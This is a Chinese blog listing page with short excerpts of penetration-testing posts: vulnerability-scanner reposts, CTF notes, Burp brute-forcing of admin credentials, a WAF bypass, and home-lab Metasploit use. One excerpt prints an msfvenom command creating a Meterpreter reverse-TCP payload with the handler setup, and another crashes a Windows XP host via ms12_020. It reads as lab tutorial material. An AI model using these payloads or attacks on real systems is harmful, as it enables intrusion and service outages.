自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

转载 Acunetix-v23.8 webscan 漏洞扫描工具

Acunetix Premium 是一种 Web 应用程序安全解决方案,用于管理多个网站、Web 应用程序和 API 的安全。集成功能允许您自动化 DevOps 和问题管理基础架构。

2023-10-07 11:06:54 201 1

转载 ExploitPackv 17.05 渗透框架

Exploit Pack自2008年以来一直在帮助全球的渗透测试人员、红队和网络安全专业人员获得其他工具无法实现的结果。我们由高技能渗透测试人员、开发人员和网络安全专家组成的团队致力于跟踪最新的趋势和技术,以确保我们的软件解决方案始终处于网络安全创新的前沿。保护您的网络,加快软件交付,防止网络攻击。

2023-10-07 11:04:47 172 1

转载 Nessus 10.6.0 VulnerabilityScanner

Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。对应渗透测试人员来说,Nessus是必不可少的工具之一。

2023-10-07 11:03:09 139 1

转载 Invicti Professional-v23.9 漏扫工具

Invicti 是一种自动化但完全可配置的 Web 应用程序安全扫描程序,使您能够扫描网站、Web 应用程序和 Web 服务,并识别安全漏洞。Invicti 可以扫描所有类型的 Web 应用程序,无论其构建平台或语言。

2023-10-07 10:59:52 1140 4

转载 Cyber Triage 3.8.0 取证工具

Cyber​​ Triage 是一款自动化数字取证和事件响应 (DFIR) 软件,可让像您这样的网络安全专业人员快速回答与恶意软件、勒索软件和帐户接管相关的入侵问题。基于主机的数据、评分、高级分析和推荐引擎可确保您的调查快速而全面。

2023-10-07 10:53:35 337 1

原创 BurpSuite 分段传输绕WAF

BurpSuite 分段传输绕WAF

2022-12-17 11:38:13 408

原创 DLL劫持复现

DLL劫持复现 某60 简单过程记录

2022-12-17 11:30:22 265

原创 TCP的握手与状态

三次握手置位概念:根据TCP的包头字段,存在3个重要的标识ACK、SYN、FINACK:表示验证字段 SYN:位数置1,表示建立TCP连接 FIN:位数置1,表示断开TCP连接过程说明:1.由客户端发送建立TCP连接的请求报文,其中报文中包含seq序列号,是由发送端随机生成的,并且将报文中的SYN字段置为1,表示需要建立TCP连接。(SYN=1,seq=x,x为随机生成数值)2.由服务端回复客户端发送的TCP连接请求报文,其中包含seq序列号,是由回复端随机生成的,并且将SYN置为1,而.

2020-11-14 23:55:31 165

原创 记一次msf渗透win10

KALI IP 192.168.186.141WIN 10 192.168.186.131生成木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exeLHOST 本地的IP地址LPORT 反向连接到主机的端口打开 msfconsoleuse exploit/multi/handler 设置模块set payload windows/meterp

2020-11-06 01:43:29 2438 2

原创 2020-10-31

发现有个source.php文件 class emmm { public static function checkFile(&$page) { //白名单列表 $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //isset()判断变量是否声明is_string()判断变量是否是字符串 &&用了逻辑.

2020-10-31 00:09:08 73

原创 BUUCTF _test_your_nc

直接连接

2020-10-30 23:25:34 385

原创 Msfconsole的基本使用

WIN XP ms12_020 复现msfconsolesearch 查找模块use 装载模块winxp ip :192.168.186.133set RHOST 设置目标主机run 执行攻击目标蓝屏死机 重启常用命令show exploits列出metasploit框架中的所有渗透攻击模块show payloads列出metasploit框架中的所有攻击载荷show auxiliary列出metasploit框架中的所有辅助攻击载荷sea

2020-09-13 21:50:39 6888 1

原创 burp爆破管理员账号密码

burp爆破管理员账号密码代理打开抓包 把包丢进intruder选中账号密码设置账号密码设置参数 线程根据电脑性能来开始跑密码最后还是没有跑出来 O(∩_∩)O哈哈~

2020-09-12 23:14:14 744

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除